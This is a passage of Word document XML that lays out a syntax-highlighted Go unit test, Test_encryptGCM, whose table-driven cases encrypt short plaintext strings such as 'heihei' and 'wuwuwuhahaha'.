          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
        <w:t>"testing"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>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CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">func </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFC66D"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Test_encryptGCM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>(t *</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="AFBF7E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>testing</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6FAFBD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>) {</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CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">type </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">args </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">struct </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A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">plaintext </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>string</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>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t>tests := []</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">struct </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lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">name </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>string</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">args </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="6FAFBD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>args</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="6FAFBD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="6FAFBD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>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A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
        <w:t>{</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A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">name: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>"Cipher: wuwuwuhahaha"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">args: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="6FAFBD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>args</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A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">plaintext: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>"wuwuwuhahaha"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>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CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>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CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, </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A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">name: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>"Cipher: heihei"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">args: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="6FAFBD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>args</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A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">plaintext: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>"heihei"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>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CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>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CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, </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A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">name: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>"Cipher: qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">args: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="6FAFBD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>args</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A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">plaintext: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>"qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>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CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>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CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
